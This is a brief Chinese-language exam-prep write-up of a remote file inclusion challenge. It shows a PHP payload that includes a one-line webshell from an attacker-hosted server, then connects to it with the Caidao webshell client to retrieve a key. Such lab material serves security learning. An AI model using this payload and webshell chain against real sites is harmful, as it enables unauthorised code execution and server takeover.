遠程文件包含雖然沒有弄到靶場,但是備考學習的時候不能不重視,畢竟誰也不知道,即將面臨的考試碰到的是什么樣的題型。可以參考下網上公開分享的資料。
題目是這樣的:
不管啥url后面都給你加了個.txt,想到應該是用遠程文件包含做
這里需要用到的知識就是利用python可以輕易在本地開一個服務器:如果有不知道怎么開的可以參考下面這里
在服務器所在的目錄下寫一個shell.txt,內容如下
<?php echo(“hi”); Include(“http://<攻擊機ip>:<攻擊機開的端口>/wen.php”); echo(“bye”); ?>,其中wen.php為一個一句話木馬。
訪問:page=http://<攻擊機ip>:<攻擊機開的端口>/shell,即可看到shell.txt已經被php解析了,用菜刀鏈接即可獲得key。
